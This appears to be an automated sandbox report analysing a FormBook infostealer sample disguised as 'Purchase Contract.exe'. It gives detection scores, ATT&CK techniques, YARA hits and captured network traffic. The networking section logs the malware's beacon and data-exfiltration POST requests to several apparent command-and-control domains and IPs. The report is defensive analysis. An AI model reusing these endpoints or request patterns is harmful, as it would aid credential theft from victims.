Play interactive tourEdit tour

# Analysis Report Purchase Contract.exe

## Overview

### Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook

### Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false

 Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
 Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

### Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through Module Load1Registry Run Keys / Startup Folder1Process Injection512Software Packing2Credential Dumping1Security Software Discovery131Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExploitation for Client Execution1Port MonitorsAccessibility FeaturesDisabling Security Tools1Input Capture1File and Directory Discovery2Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureSystem Information Discovery12Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information2Credentials in FilesVirtualization/Sandbox Evasion3Logon ScriptsInput Capture1Data EncryptedStandard Application Layer Protocol14SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion3Brute ForceRemote System Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection512Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

### Signature Overview

#### AV Detection:

 Multi AV Scanner detection for domain / URL Show sources
 Source: www.porcber.com Virustotal: Detection: 6% Perma Link Source: http://www.porcber.com Virustotal: Detection: 6% Perma Link
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe Virustotal: Detection: 32% Perma Link Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe ReversingLabs: Detection: 45%
 Multi AV Scanner detection for submitted file Show sources
 Source: Purchase Contract.exe Virustotal: Detection: 32% Perma Link Source: Purchase Contract.exe ReversingLabs: Detection: 45%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPE
 Machine Learning detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe Joe Sandbox ML: detected
 Machine Learning detection for sample Show sources
 Source: Purchase Contract.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 15.2.updategtmlg.exe.49a0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 13.2.updategtmlg.exe.57c0000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 0.2.Purchase Contract.exe.5370000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

#### Networking:

 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=jbVBrWG8kPPy1CntJKnIS/p3pTRMEOwQ7pcd0/8muHz8lgjxNZOf5/N47Cv4WKIkQI5C HTTP/1.1Host: www.bookwormegy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?Kxlpd=usiFhkEA2/xQfSWIf5NGRhfLT8+t9rWHJvPEvA/+NM3yMCY4ViL3D3aLSorWeJjb+qc5&tpeDP4=aN6tXx HTTP/1.1Host: www.bridgejfc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1Host: www.axcyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?Kxlpd=YpYaXTMBQs0E5vLJ/Yd9Yn8LoZOIuIOD62g1IdciXa5/abOgLLAXWzIHQlYdUNrQ6hv1&tpeDP4=aN6tXx HTTP/1.1Host: www.3dlasermaroc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=2djJOWHHKK7eyXP0GpI/PgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tCFLL5Q3Er2 HTTP/1.1Host: www.porcber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=bMzkr1fzZV+5QtXNWK4LXWvgw9C8VqyMR5lohTVdFC9G3pcizxH8g+YNb0t5pLB/ZO8J HTTP/1.1Host: www.yyw518.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?Kxlpd=G5Xu6NHE4SkrvqPWXnU3UeXHC3kT8kLmWInNSoQ44xAbeTfsQH//0ntHgBoI/3bOih10&tpeDP4=aN6tXx HTTP/1.1Host: www.vamojunto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 35.242.251.130 35.242.251.130 Source: Joe Sandbox View IP Address: 94.136.40.82 94.136.40.82 Source: Joe Sandbox View IP Address: 23.20.239.12 23.20.239.12
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.bridgejfc.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.bridgejfc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bridgejfc.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 6d 4f 75 5f 28 41 35 4c 69 6f 59 44 41 52 47 4b 43 5f 38 51 4c 6b 76 50 63 65 69 76 71 4c 79 44 59 59 28 47 28 77 54 6c 4e 66 69 77 43 51 42 68 5a 33 7e 48 52 69 37 38 41 59 6d 73 5a 5a 76 44 76 76 67 39 6d 47 63 45 4f 77 28 6c 45 48 4c 52 6d 51 76 6e 4f 53 4c 4a 32 34 75 31 6b 4d 51 64 6f 62 70 6d 76 72 6d 4d 6e 62 53 74 67 6d 5a 50 59 66 75 64 68 38 30 4a 4d 51 4a 51 64 68 37 4e 75 7a 31 6e 4f 33 79 78 28 4f 4a 78 32 32 4d 79 6b 39 4f 4e 76 53 58 56 41 48 6c 77 6c 2d 41 42 69 58 31 59 36 59 30 39 6b 78 46 44 58 72 73 75 4a 76 4c 76 39 38 43 33 47 78 68 58 6e 67 6f 73 73 42 4f 30 64 5f 66 59 57 33 42 49 75 39 47 46 71 48 37 57 6a 44 62 50 5a 7a 77 50 67 46 41 46 4b 36 31 55 6a 63 5a 58 49 77 62 6f 69 48 71 2d 63 54 28 36 65 66 37 6c 46 49 4f 49 51 44 57 76 31 62 62 54 54 4e 78 58 71 5a 47 35 52 6b 7e 34 4a 54 71 67 6a 44 68 35 42 66 71 59 33 6f 41 33 38 76 75 38 36 55 45 42 66 71 4c 4f 31 4a 74 75 72 50 32 56 38 78 51 78 38 63 6c 44 36 72 4d 52 66 4d 63 41 62 47 73 62 4f 44 56 45 59 73 30 46 42 57 57 74 73 6d 55 77 51 72 51 42 44 69 4f 53 74 47 65 6a 36 48 6e 75 44 57 46 4a 75 34 48 74 63 61 75 34 78 63 65 71 7a 46 4c 34 4a 30 30 70 79 50 50 67 69 65 67 54 7e 62 57 36 4d 63 36 48 45 34 71 51 32 6f 39 33 62 5f 66 37 6b 73 4e 79 36 75 68 69 30 49 42 46 34 45 47 6f 6e 32 66 4d 56 7a 6f 46 68 4d 72 78 41 69 64 44 64 6f 54 6a 31 45 43 4e 47 36 71 35 28 30 67 33 33 34 63 2d 6e 4a 35 51 33 57 58 39 4f 53 33 79 73 67 4d 72 53 53 73 57 39 6c 62 68 61 56 41 48 6c 54 62 4f 37 4d 74 53 31 63 67 51 47 76 54 64 77 53 69 50 6a 46 77 61 4c 65 6d 55 53 72 52 50 66 58 52 63 72 74 4a 4b 65 74 68 62 78 39 4d 4c 76 36 67 34 74 31 5a 63 72 58 4b 6d 41 64 70 48 33 6f 51 59 38 5f 79 56 70 5f 32 47 67 2d 56 33 42 30 42 74 39 52 73 45 78 54 36 42 54 49 6f 63 6e 64 68 6c 68 72 7a 79 73 41 75 48 75 76 48 75 6b 57 68 6e 52 48 58 68 78 32 4a 74 41 6f 74 73 50 61 79 49 41 67 38 6b 52 33 69 51 78 6e 6a 47 57 58 35 41 33 5a 79 31 36 75 35 4a 47 7a 58 76 78 59 6f 41 32 4c 46 64 74 56 49 30 7a 59 74 7a 65 6d 68 6c 48 75 30 77 32 35 52 76 74 72 55 76 66 37 68 56 51 74 72 68 72 53 71 30 77 41 6c 31 63 56 30 4c 71 36 72 54 6e 70 43 66 52 50 4f 64 6d 44 78 52 31 75 4d 6d 76 45 65 42 43 44 73 69 33 30 35 65 6c 68 49 59 54 75 77 31 52 71 30 4c 70 61 69 78 30 6f 43 4d 43 57 31 4d 77 55 34 78 71 6f 6d 30 4a 68 53 34 48 32 4d 32 71 62 59 6e 31 70 4a 52 46 49 67 61 79 68 50 33 4b 48 66 79 39 56 55 45 47 2d 6d 61 58 48 45 43 4f 41 62 46 78 4b 36 76 71 55 67 6e 75 38 56 41 33 53 54 2d 76 52 4e 78 41 38 30 68 55 7a 74 66 71 68 4c 44 5a 46 67 57 4d 4c 6f 75 47 5f 50 48 46 33 4c 6 Source: global traffic HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.axcyl.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.axcyl.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.axcyl.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 63 2d 73 43 57 37 32 6d 30 7a 79 4b 55 34 28 5a 52 49 5a 75 45 58 77 63 7e 68 30 6f 44 76 4a 48 4a 68 73 53 43 78 71 74 61 43 6e 34 28 54 67 6e 54 74 5a 47 6f 6d 33 70 51 6e 34 47 59 65 70 32 64 73 79 41 4f 41 28 69 59 45 4a 6c 76 37 56 72 6f 75 4c 42 31 71 6b 4b 30 53 72 43 6e 70 39 52 37 71 4b 34 62 56 76 6e 73 56 68 33 47 51 57 41 38 43 79 66 44 38 73 62 54 37 67 33 72 64 51 45 6c 52 6b 34 54 58 45 6a 4f 35 62 48 43 46 6f 54 69 52 41 6d 65 2d 30 63 45 78 36 75 7e 56 4f 4a 39 78 34 4d 52 6b 36 35 75 57 4a 45 74 58 50 53 6a 75 59 6e 28 75 51 59 4e 61 69 6a 4c 79 58 4a 79 64 41 30 63 52 52 49 33 76 58 45 44 52 5a 70 68 71 5a 78 4b 54 70 37 56 7a 67 58 73 6d 6c 4e 28 35 48 36 5a 39 37 47 64 5a 6b 6a 32 64 43 56 7a 65 66 44 39 33 48 71 72 35 70 56 4f 7a 57 42 53 32 53 34 79 4b 70 75 34 66 6d 49 28 30 56 63 55 6b 67 61 7a 54 35 4f 54 75 73 54 51 71 7e 6d 74 2d 5a 4b 4d 4f 4f 49 42 48 63 35 6b 45 69 33 68 59 56 54 4b 33 63 4f 39 59 64 34 48 62 34 6a 4f 79 4c 32 59 6a 41 7a 59 63 4e 50 32 50 7e 45 4d 66 38 77 50 58 7e 57 72 35 4e 6c 45 67 5a 36 4e 43 49 72 77 4e 74 50 64 4e 4c 56 66 76 7e 72 30 6d 56 4a 4f 42 69 71 56 68 72 6d 4e 64 5a 4d 38 2d 67 6c 74 6d 49 6c 32 4a 46 79 43 47 70 52 58 37 6b 6d 71 33 37 52 72 32 71 46 35 32 6c 4e 71 4d 56 36 76 79 66 46 61 35 6a 4d 42 48 61 7a 56 7a 34 34 44 30 53 75 79 37 61 69 51 67 44 53 4d 45 44 61 55 33 75 43 62 75 54 73 66 35 76 78 73 44 46 4f 6f 50 75 6b 4c 46 42 6e 43 6d 51 69 50 74 37 53 74 75 33 6e 33 30 4d 74 59 42 76 41 45 32 56 52 43 57 73 44 6d 30 73 42 57 75 4d 36 48 51 30 6a 44 77 74 51 58 30 57 4c 53 33 4a 7a 6b 31 4e 53 75 59 4f 6c 53 61 45 6e 75 77 6d 79 39 75 72 72 57 5a 32 4c 46 5a 77 6c 38 5a 54 73 71 55 53 37 45 37 4a 5f 53 54 52 6f 52 4c 56 48 38 68 69 56 57 6a 61 42 57 4c 6a 59 36 64 4b 6e 45 44 30 6e 30 6f 4c 5f 28 2d 58 55 63 53 34 46 52 75 38 34 4f 32 61 31 33 68 55 61 74 70 46 58 30 66 54 57 59 4a 78 5a 51 64 39 64 41 6d 32 6d 76 4c 4c 4a 63 44 69 77 76 57 65 4f 66 53 34 6c 78 34 46 67 7e 4d 42 46 28 66 66 4c 66 59 57 6e 54 67 66 69 37 79 77 58 63 33 78 4e 4b 59 48 42 37 51 52 73 33 6d 33 4f 62 5f 54 7a 42 66 73 36 50 38 35 64 49 4e 69 78 6d 42 61 56 6f 78 59 33 57 67 53 57 45 48 33 31 55 61 41 70 67 2d 7a 37 6b 2d 52 4c 6d 7a 7a 61 4a 34 72 45 69 2d 56 4b 75 5f 53 56 39 6f 61 30 66 51 38 46 36 7a 7a 6e 36 43 64 4e 58 71 42 58 35 6f 62 73 61 41 6e 4a 49 41 64 4d 4f 57 53 59 61 43 6a 68 62 31 41 58 6f 31 35 41 74 4c 7a 6d 7e 36 54 79 73 79 46 77 54 55 38 4b 7a 30 78 6d 66 38 67 31 51 74 57 6e 51 63 28 42 6e 77 72 6d 59 4a 76 75 4c 4f 77 4d 34 51 6b 62 30 48 6a 33 77 74 5a 6b 42 33 35 6 Source: global traffic HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.3dlasermaroc.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.3dlasermaroc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3dlasermaroc.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 51 4c 55 67 4a 31 42 4a 49 35 42 72 37 6f 58 49 36 73 64 6a 48 6e 41 71 68 4c 66 45 67 6f 47 38 75 78 4a 54 59 71 41 41 54 4c 70 6a 61 34 32 2d 4a 72 6c 51 5a 6b 56 56 4d 6b 6c 39 5a 63 50 48 37 52 69 36 59 4a 49 30 73 63 53 76 6f 39 72 54 54 62 6f 57 5a 4f 6f 30 31 73 65 66 79 79 61 52 4b 71 64 6a 6f 62 66 4e 4c 5f 4b 73 30 63 4a 43 75 73 31 50 75 69 48 52 6a 39 61 55 56 55 72 77 66 64 77 30 47 38 71 7a 56 39 77 34 77 41 5a 52 62 2d 68 77 36 56 4d 53 38 4e 73 74 6d 35 77 35 61 76 6b 76 32 72 6a 71 6e 4c 42 75 68 34 31 49 6f 5f 55 4b 77 41 69 62 43 36 58 74 68 77 51 6d 41 45 51 6a 59 56 38 30 33 53 72 48 4d 78 76 71 64 64 56 48 46 44 58 61 7a 39 49 55 39 38 44 71 67 4d 77 41 42 74 62 77 4f 4b 4e 32 59 61 47 72 4c 6f 38 39 56 4e 4f 37 56 4b 53 4d 55 2d 34 35 77 37 4a 36 6e 4b 54 64 44 35 61 32 31 56 45 72 4c 32 58 37 66 4b 54 47 4b 4c 79 35 44 5a 64 30 45 45 53 5a 74 63 76 37 50 4c 45 62 6e 47 4e 64 61 6f 41 36 63 65 62 5f 55 78 61 38 61 36 4e 78 49 69 35 62 59 37 7a 34 77 69 6b 66 78 52 52 53 68 4a 61 35 69 71 6d 35 32 4d 63 6f 74 56 5a 33 35 72 41 2d 49 75 53 4c 36 6e 53 48 34 33 48 58 79 34 31 33 28 36 4a 54 4d 39 42 44 41 4e 7a 5f 75 49 68 61 6b 38 57 64 32 47 75 4f 77 71 36 51 46 5a 75 53 6f 2d 30 42 55 6b 73 35 61 69 65 4d 7e 58 35 71 63 66 78 39 77 73 67 36 4b 2d 37 32 4f 57 4a 51 77 56 74 71 77 64 6c 6c 74 37 45 45 7e 6e 59 43 77 79 31 38 47 6c 65 51 74 34 65 36 33 5f 55 44 36 46 73 4a 41 59 49 45 30 50 6c 6e 67 32 66 54 6d 52 4b 44 50 68 52 35 72 57 50 34 36 6e 71 71 65 36 4f 6c 64 64 34 76 4f 4b 7a 62 6b 36 48 5a 52 33 6a 75 6d 32 28 37 72 53 77 62 4a 66 39 59 43 30 58 43 54 79 65 41 53 34 6f 55 7e 6c 35 32 37 49 46 35 61 57 5a 6d 6a 70 53 53 54 66 51 34 68 7a 32 54 75 30 53 6e 57 75 33 35 6b 48 7a 47 56 73 37 33 54 4d 50 6c 47 6b 76 4e 38 77 6c 67 49 79 53 77 68 4e 6a 63 33 4f 78 6b 4e 78 71 47 33 7a 47 62 51 6f 66 30 43 62 4e 61 41 49 59 65 52 7a 59 4c 71 79 6c 78 67 70 46 5f 4e 33 69 53 67 4b 37 34 61 6b 6e 4a 4d 32 58 46 43 44 35 68 50 71 59 5a 66 61 59 38 6d 64 54 48 73 62 6d 4d 6d 4f 59 63 36 5a 45 6e 53 72 59 78 32 6f 37 6f 37 76 42 68 69 34 30 62 63 31 34 4e 52 57 61 64 4b 2d 42 77 30 69 41 33 34 62 32 38 41 61 42 68 39 50 35 4c 44 4c 43 6a 49 33 4e 73 68 57 36 56 51 68 33 58 6a 48 78 65 6f 7a 73 68 37 70 57 73 74 42 52 6f 37 4f 52 4f 28 7a 46 41 69 43 4f 73 4b 39 78 55 4d 59 49 6d 47 34 59 36 52 79 61 6c 28 5a 45 31 7e 48 28 32 71 79 35 39 35 4c 55 49 6b 43 45 69 62 33 30 5a 67 35 55 76 34 45 78 61 6d 39 69 46 6f 74 46 2d 52 36 51 55 67 7a 37 39 37 55 63 77 35 78 6f 6a 55 37 42 36 38 56 54 76 46 55 4e 43 6 Source: global traffic HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.porcber.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.porcber.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.porcber.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 7e 5f 76 7a 51 32 6d 62 65 74 69 71 69 55 72 5f 46 2d 6f 6d 59 6b 44 6b 6e 67 6e 59 45 37 5a 48 67 48 7a 5a 45 36 37 69 6a 6b 64 65 33 72 71 41 77 74 7e 7a 70 35 63 73 33 73 28 41 45 75 52 59 75 30 61 48 4e 46 4d 66 64 65 4a 7a 52 4c 68 74 28 6f 6c 43 53 4a 68 50 62 53 49 47 50 33 6a 6f 36 6c 41 30 76 32 61 6f 32 39 66 79 71 72 46 61 59 4a 78 79 66 65 6e 44 78 32 46 7a 37 75 7e 32 30 36 58 39 57 6f 56 6e 45 53 48 6d 79 4c 32 33 49 78 78 70 76 58 52 64 74 5f 56 35 62 76 52 50 66 53 70 43 69 6c 4b 45 53 74 64 7a 65 4c 44 55 28 4c 41 61 46 76 75 7a 37 70 35 4d 65 49 51 6d 57 54 33 76 38 62 4c 6b 36 67 72 68 46 57 34 44 68 75 30 74 79 72 33 68 73 79 28 68 62 65 56 32 79 79 4f 49 51 36 6e 73 42 77 56 61 6f 6a 4f 53 43 49 68 6f 48 54 45 74 6a 50 30 42 50 36 58 4c 66 50 4d 55 44 57 73 48 68 72 6a 46 61 2d 54 6f 48 66 64 71 34 32 50 41 6d 45 44 77 64 7a 49 4f 59 69 39 43 53 36 45 6a 63 4a 74 34 70 63 50 49 55 72 77 5a 48 4a 48 6a 75 31 4c 69 41 63 6b 7a 46 79 45 52 49 34 30 4b 33 79 34 64 4f 62 48 43 78 33 65 53 66 65 32 4b 51 54 67 39 30 47 50 74 44 6e 33 52 6f 50 75 7a 56 75 74 4c 59 64 4b 39 46 39 63 31 4a 63 68 56 4f 7a 7e 30 4c 45 69 69 46 54 70 69 28 45 67 30 35 53 71 73 6e 34 34 4c 74 7a 28 61 39 49 6f 44 6d 48 54 77 6d 42 65 69 65 34 34 4d 35 61 37 4a 7a 4c 69 68 69 70 68 36 31 6f 6a 37 61 6e 76 61 52 45 52 63 72 78 5a 7a 79 63 48 77 38 79 6e 39 75 71 64 71 28 68 47 44 4a 44 4c 73 46 4c 51 6f 7a 65 39 71 35 35 55 35 77 78 63 33 62 6a 77 73 68 34 4c 62 5a 38 51 66 37 64 38 4b 72 6d 5a 68 53 42 6a 64 64 76 76 47 41 4e 76 56 67 37 44 4e 77 2d 78 7a 79 56 36 6c 4f 31 54 6e 36 71 69 6b 37 33 56 4e 41 42 4e 58 77 53 43 56 64 55 50 61 65 4d 38 76 54 44 71 64 30 4d 55 78 46 54 68 68 55 58 31 4b 4b 5f 73 4b 36 63 70 31 6c 56 6f 69 7e 32 71 44 54 4f 76 4b 37 59 39 46 7a 56 72 6c 47 77 43 50 34 63 74 6e 30 55 74 41 39 4a 64 51 50 6e 52 4c 32 6a 65 32 4a 34 6a 41 5a 55 76 66 76 72 41 51 31 6d 61 69 46 69 51 65 79 51 46 5f 77 58 49 4d 4c 33 67 52 6b 56 79 44 7e 4a 75 4c 30 73 67 61 4f 6e 58 4a 35 65 39 42 67 30 32 44 6e 72 4f 7a 6b 7a 41 75 63 41 36 56 59 52 4d 52 42 71 73 57 53 6f 4a 66 45 6b 45 36 7a 49 45 56 52 59 48 56 46 30 41 30 66 37 79 34 62 65 41 61 79 76 69 57 39 31 4b 6f 64 42 4d 4b 69 31 51 4e 73 47 79 30 62 4a 78 38 78 30 58 52 4f 58 74 72 53 79 4c 79 4f 4b 4e 41 50 46 4a 4c 75 65 65 44 63 51 67 4f 36 7a 56 64 51 48 4d 5f 53 72 6f 6b 42 70 58 62 70 5a 38 48 68 4a 61 4d 34 45 42 4e 59 6f 75 46 64 4f 41 5f 4f 69 7a 61 76 52 7a 4a 70 32 7e 34 39 54 57 2d 39 78 28 68 44 4d 6f 62 55 58 6f 62 31 55 4b 6f 43 49 76 79 6d 4f 6a 5f 31 48 73 56 47 5 Source: global traffic HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.yyw518.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.yyw518.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yyw518.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 54 75 28 65 31 51 7e 47 4a 77 7a 77 4b 65 54 30 52 4d 74 62 55 51 44 44 38 76 43 50 66 70 66 47 43 70 38 66 6c 67 56 46 4d 79 39 58 35 4e 59 55 35 67 57 77 6f 61 42 72 46 47 4d 4c 74 37 55 57 41 39 41 42 65 6b 6a 70 7e 48 5a 4f 36 6b 35 70 48 38 34 30 42 5a 68 44 68 42 76 31 63 32 67 42 79 65 71 66 55 7a 37 73 64 79 6d 41 71 53 53 69 43 4f 67 6b 54 63 63 4a 33 79 6e 35 51 56 64 64 4f 54 74 5f 46 6e 76 61 79 72 6c 4e 54 6e 34 63 71 76 57 38 52 4a 46 45 51 66 68 72 77 4a 63 41 67 33 31 45 54 66 49 43 7e 7a 6b 6b 33 79 56 41 43 5f 74 5a 30 64 6c 64 58 35 68 4a 6f 32 70 68 66 35 53 35 51 74 57 77 4d 4e 52 36 6b 6d 57 5a 4e 66 48 73 56 49 64 4e 49 61 67 79 35 46 4c 54 55 32 71 6c 4c 44 70 55 46 4a 32 6f 4f 33 4e 53 69 48 59 54 4d 48 4e 4a 4b 6c 64 52 69 74 51 52 62 6f 77 69 68 2d 46 30 6a 57 73 64 64 4f 7e 50 44 42 4d 6d 76 42 57 6f 33 35 65 44 59 58 4c 70 74 5f 38 46 36 4c 4c 4f 7a 4c 57 73 61 59 4c 43 42 50 52 4e 37 31 57 45 7a 6e 52 5a 37 34 48 74 67 52 75 61 4c 6e 6f 75 4e 67 30 2d 36 74 4a 79 71 53 6e 67 51 52 68 57 54 67 47 76 61 31 4f 74 6f 63 6f 75 55 37 59 74 34 74 46 65 73 77 28 7a 50 36 50 30 52 71 41 31 4d 31 70 63 70 48 64 58 70 32 52 4a 51 6c 32 77 45 48 28 6d 7a 58 6b 69 46 33 28 57 35 43 73 65 39 30 76 58 69 42 30 67 57 68 28 52 4c 34 53 76 5a 5a 35 38 76 5f 41 7a 51 4f 75 70 41 39 39 5a 6c 76 71 73 78 78 4d 39 43 4e 41 48 79 63 73 75 30 64 4f 42 67 37 4e 75 39 35 52 57 67 61 39 51 4c 77 33 30 31 64 39 37 4d 45 74 4e 38 5f 62 48 4c 6b 57 67 69 47 4e 51 75 54 52 70 30 71 50 69 46 46 58 73 32 73 38 31 6e 33 6f 76 71 4b 6e 63 6a 34 63 4e 38 79 6a 62 33 68 62 65 41 63 35 55 6b 73 52 4a 5a 6e 31 45 74 39 78 6b 41 7a 66 61 61 74 5a 7a 72 79 74 64 59 65 72 2d 4e 6c 58 4d 4d 38 6a 78 69 30 46 67 4c 56 58 58 6a 74 4a 6e 61 72 4d 68 46 4a 64 32 70 4b 28 71 61 77 65 74 6f 42 6d 30 56 63 54 32 55 4a 6d 35 4c 4d 58 33 6f 66 46 77 6c 63 30 76 62 62 5a 48 66 5a 45 6d 30 59 4d 4c 32 6a 61 79 6f 37 6b 73 67 61 33 5a 7a 66 37 34 41 2d 4c 63 36 41 4a 50 43 4a 31 4e 4c 4f 36 68 4f 32 48 68 48 71 75 67 44 6d 30 7a 56 42 71 50 7a 7a 75 2d 6e 43 6b 37 38 45 76 67 76 34 4e 53 70 30 6d 48 35 58 67 74 55 76 58 62 63 38 76 57 48 52 5a 69 41 58 42 5f 55 65 28 59 33 39 4c 59 